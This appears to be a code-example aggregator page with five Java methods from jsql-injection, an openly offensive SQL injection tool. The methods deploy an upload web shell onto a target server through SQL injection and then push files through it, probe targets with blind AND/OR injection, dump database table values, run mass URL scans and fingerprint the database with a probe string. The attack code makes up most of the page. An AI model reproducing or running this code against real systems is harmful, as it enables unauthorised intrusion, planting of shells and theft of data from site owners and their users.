Example 16 with Request
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ResourceAccess method uploadFile.
/**
* Upload a file to the server.
* @param pathFile Remote path of the file to upload
* @param urlFile URL of uploaded file
* @param file File to upload
* @throws JSqlException
* @throws IOException
* @throws InterruptedException
* @throws URISyntaxException
*/
public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
if (!this.isReadingAllowed()) {
return;
}
String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")).replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);
String pathShellFixed = pathFile;
if (!pathShellFixed.matches(".*/$")) {
pathShellFixed += "/";
}
this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<" + DataAccess.LEAD + ">" + sourceShellToInject + "<" + DataAccess.TRAIL + ">", pathShellFixed + this.filenameUpload), "upload");
var sourcePage = new String[] { StringUtils.EMPTY };
String sourceShellInjected;
try {
sourceShellInjected = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(pathShellFixed + this.filenameUpload), sourcePage, false, 1, null, "upload");
if (StringUtils.isEmpty(sourceShellInjected)) {
throw new JSqlException("Bad payload integrity: Empty payload");
}
} catch (JSqlException e) {
throw this.getIntegrityError(sourcePage);
}
String urlFileFixed = urlFile;
if (StringUtils.isEmpty(urlFileFixed)) {
urlFileFixed = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf('/') + 1);
}
if (sourceShellInjected.indexOf(sourceShellToInject) > -1) {
String logUrlFileFixed = urlFileFixed;
String logPathShellFixed = pathShellFixed;
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Upload payload deployed at '{}{}' in '{}{}'", () -> logUrlFileFixed, () -> this.filenameUpload, () -> logPathShellFixed, () -> this.filenameUpload);
try (InputStream streamToUpload = new FileInputStream(file)) {
HttpResponse<String> result = this.upload(file, urlFileFixed + "/" + this.filenameUpload, streamToUpload);
this.confirmUpload(file, pathShellFixed, urlFileFixed, result);
}
} else {
throw this.getIntegrityError(sourcePage);
}
var request = new Request();
request.setMessage(Interaction.END_UPLOAD);
this.injectionModel.sendToViews(request);
}
Also used :
JSqlException(com.jsql.model.exception.JSqlException)
SuspendableGetRows(com.jsql.model.suspendable.SuspendableGetRows)
FileInputStream(java.io.FileInputStream)
InputStream(java.io.InputStream)
HttpRequest(java.net.http.HttpRequest)
Request(com.jsql.model.bean.util.Request)
FileInputStream(java.io.FileInputStream)
Example 17 with Request
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class StrategyInjectionBlind method checkApplicability.
@Override
public void checkApplicability() throws StoppedByUserSlidingException {
if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBooleanBlind())) {
LOGGER.log(LogLevel.CONSOLE_INFORM, "No Blind strategy known for {}", this.injectionModel.getMediatorVendor().getVendor());
} else {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with AND...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.AND);
this.isApplicable = this.injectionBlind.isInjectable();
if (!this.isApplicable) {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with OR...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.OR);
this.isApplicable = this.injectionBlind.isInjectable();
if (this.isApplicable) {
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with OR", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
}
} else {
LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with AND", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
}
if (this.isApplicable) {
this.allow();
var requestMessageBinary = new Request();
requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY);
requestMessageBinary.setParameters(this.injectionBlind.getInfoMessage());
this.injectionModel.sendToViews(requestMessageBinary);
} else {
this.unallow();
}
}
}
Also used :
InjectionBlind(com.jsql.model.injection.strategy.blind.InjectionBlind)
Request(com.jsql.model.bean.util.Request)
Example 18 with Request
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class DataAccess method listValues.
/**
* Get table values and count each occurrences and send them to the view.<br>
* Values are on clear text (not hexa) and follows this window pattern<br>
* => hh[value 1]jj[count]hhgghh[value 2]jj[count]hhggh...hi<br>
* Data window can be cut before the end of the request but the process helps to obtain
* the rest of the unreachable data. The process can be interrupted by the user (stop/pause).
* @param columns choice by the user
* @return a 2x2 table containing values by columns
* @throws JSqlException when injection failure or stopped by user
*/
public String[][] listValues(List<Column> columns) throws JSqlException {
var database = (Database) columns.get(0).getParent().getParent();
var table = (Table) columns.get(0).getParent();
int rowCount = columns.get(0).getParent().getChildCount();
// Inform the view that table has just been used
var request = new Request();
request.setMessage(Interaction.START_PROGRESS);
request.setParameters(table);
this.injectionModel.sendToViews(request);
// Build an array of column names
List<String> columnsName = new ArrayList<>();
for (AbstractElementDatabase e : columns) {
columnsName.add(e.toString());
}
// From that array, build the SQL fields nicely
// => col1{%}col2...
// ==> trim(ifnull(`col1`,0x00)),0x7f,trim(ifnull(`Col2`,0x00))...
String[] arrayColumns = columnsName.toArray(new String[columnsName.size()]);
List<List<String>> listValues = this.getRows(database, table, rowCount, arrayColumns);
// Add the default title to the columns: row number, occurrence
columnsName.add(0, StringUtils.EMPTY);
columnsName.add(0, StringUtils.EMPTY);
String[][] tableDatas = this.build2D(columnsName, listValues);
arrayColumns = columnsName.toArray(new String[columnsName.size()]);
// Group the columns names, values and Table object in one array
var objectData = new Object[] { arrayColumns, tableDatas, table };
var requestCreateValuesTab = new Request();
requestCreateValuesTab.setMessage(Interaction.CREATE_VALUES_TAB);
requestCreateValuesTab.setParameters(objectData);
this.injectionModel.sendToViews(requestCreateValuesTab);
var requestEndProgress = new Request();
requestEndProgress.setMessage(Interaction.END_PROGRESS);
requestEndProgress.setParameters(table);
this.injectionModel.sendToViews(requestEndProgress);
return tableDatas;
}
Also used :
Table(com.jsql.model.bean.database.Table)
Request(com.jsql.model.bean.util.Request)
ArrayList(java.util.ArrayList)
AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase)
AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase)
Database(com.jsql.model.bean.database.Database)
ArrayList(java.util.ArrayList)
List(java.util.List)
Example 19 with Request
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ManagerScan method scan.
/**
* Start fast scan of URLs in sequence and display result.
* Unplug any existing view and plug a console-like view in order to
* respond appropriately to GUI message with simple text result instead of
* build complex graphical components during the multi website injections.
* At the end of the scan it plugs again the normal view.
* @param urlsItemList contains a list of String URL
*/
public void scan(List<ItemList> urlsItemList) {
// Erase everything in the view from a previous injection
var requests = new Request();
requests.setMessage(Interaction.RESET_INTERFACE);
MediatorHelper.model().sendToViews(requests);
// wait for ending of ongoing interaction between two injections
try {
Thread.sleep(500);
} catch (InterruptedException e) {
LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
Thread.currentThread().interrupt();
}
// Display result only in console
var requestUnsubscribe = new Request();
requestUnsubscribe.setMessage(Interaction.UNSUBSCRIBE);
MediatorHelper.model().sendToViews(requestUnsubscribe);
MediatorHelper.model().subscribe(new ScanListTerminal());
MediatorHelper.model().setIsScanning(true);
MediatorHelper.model().getResourceAccess().setScanStopped(false);
for (ItemList urlItemList : urlsItemList) {
var urlItemListScan = (ItemListScan) urlItemList;
if (MediatorHelper.model().isStoppedByUser() || MediatorHelper.model().getResourceAccess().isScanStopped()) {
break;
}
LOGGER.log(LogLevel.CONSOLE_INFORM, "Scanning {}", urlItemListScan.getBeanInjection().getUrl());
MediatorHelper.model().getMediatorUtils().getParameterUtil().controlInput(urlItemListScan.getBeanInjection().getUrl(), urlItemListScan.getBeanInjection().getRequest(), urlItemListScan.getBeanInjection().getHeader(), urlItemListScan.getBeanInjection().getMethodInstance(), urlItemListScan.getBeanInjection().getRequestType(), true);
try {
Thread.sleep(500);
} catch (InterruptedException e) {
LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
Thread.currentThread().interrupt();
}
}
// Get back the normal view
MediatorHelper.model().sendToViews(requestUnsubscribe);
MediatorHelper.model().subscribe(MediatorHelper.frame().getSubscriber());
MediatorHelper.model().setIsScanning(false);
MediatorHelper.model().setIsStoppedByUser(false);
MediatorHelper.model().getResourceAccess().setScanStopped(false);
var request = new Request();
request.setMessage(Interaction.END_SCAN);
MediatorHelper.model().sendToViews(request);
}
Also used :
ScanListTerminal(com.jsql.view.scan.ScanListTerminal)
ItemList(com.jsql.view.swing.list.ItemList)
Request(com.jsql.model.bean.util.Request)
ItemListScan(com.jsql.view.swing.list.ItemListScan)
Example 20 with Request
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class MediatorVendor method fingerprintVendor.
public Vendor fingerprintVendor() {
Vendor vendorFound = null;
if (this.injectionModel.getMediatorVendor().getVendorByUser() != this.injectionModel.getMediatorVendor().getAuto()) {
vendorFound = this.injectionModel.getMediatorVendor().getVendorByUser();
LOGGER.log(LogLevel.CONSOLE_INFORM, MediatorVendor.LOG_VENDOR, () -> I18nUtil.valueByKey("LOG_DATABASE_TYPE_FORCED_BY_USER"), () -> this.injectionModel.getMediatorVendor().getVendorByUser());
} else {
LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Fingerprinting database...");
var insertionCharacter = "'\"#-)'\"*";
String pageSource = this.injectionModel.injectWithoutIndex(insertionCharacter, "test#vendor");
var mediatorVendor = this.injectionModel.getMediatorVendor();
Vendor[] vendorsWithoutAuto = mediatorVendor.getVendors().stream().filter(v -> v != mediatorVendor.getAuto()).toArray(Vendor[]::new);
// Test each vendor
for (Vendor vendorTest : vendorsWithoutAuto) {
if (pageSource.matches("(?si)" + vendorTest.instance().fingerprintErrorsAsRegex())) {
vendorFound = vendorTest;
LOGGER.log(LogLevel.CONSOLE_SUCCESS, MediatorVendor.LOG_VENDOR, () -> "Basic fingerprint matching vendor", () -> vendorTest);
break;
}
}
vendorFound = this.initializeVendor(vendorFound);
}
var requestSetVendor = new Request();
requestSetVendor.setMessage(Interaction.SET_VENDOR);
requestSetVendor.setParameters(vendorFound);
this.injectionModel.sendToViews(requestSetVendor);
return vendorFound;
}
Also used :
Arrays(java.util.Arrays)
VendorYaml(com.jsql.model.injection.vendor.model.VendorYaml)
EnumMap(java.util.EnumMap)
StringUtils(org.apache.commons.lang3.StringUtils)
Header(com.jsql.model.bean.util.Header)
Interaction(com.jsql.model.bean.util.Interaction)
List(java.util.List)
Logger(org.apache.logging.log4j.Logger)
Request(com.jsql.model.bean.util.Request)
Map(java.util.Map)
LogLevel(com.jsql.util.LogLevel)
Vendor(com.jsql.model.injection.vendor.model.Vendor)
I18nUtil(com.jsql.util.I18nUtil)
LogManager(org.apache.logging.log4j.LogManager)
InjectionModel(com.jsql.model.InjectionModel)
Request(com.jsql.model.bean.util.Request)
Vendor(com.jsql.model.injection.vendor.model.Vendor)
Aggregations
Request (com.jsql.model.bean.util.Request)47
ArrayList (java.util.ArrayList)13
Header (com.jsql.model.bean.util.Header)12
EnumMap (java.util.EnumMap)12
ExecutorCompletionService (java.util.concurrent.ExecutorCompletionService)11
ExecutorService (java.util.concurrent.ExecutorService)11
JSqlException (com.jsql.model.exception.JSqlException)10
SuspendableGetRows (com.jsql.model.suspendable.SuspendableGetRows)9
IOException (java.io.IOException)9
ThreadFactoryCallable (com.jsql.model.suspendable.callable.ThreadFactoryCallable)8
ExecutionException (java.util.concurrent.ExecutionException)8
InjectionFailureException (com.jsql.model.exception.InjectionFailureException)7
ItemList (com.jsql.view.swing.list.ItemList)7
MalformedURLException (java.net.MalformedURLException)6
HttpRequest (java.net.http.HttpRequest)6
URL (java.net.URL)5
List (java.util.List)5
Matcher (java.util.regex.Matcher)5
IgnoreMessageException (com.jsql.model.exception.IgnoreMessageException)4
StoppedByUserSlidingException (com.jsql.model.exception.StoppedByUserSlidingException)4
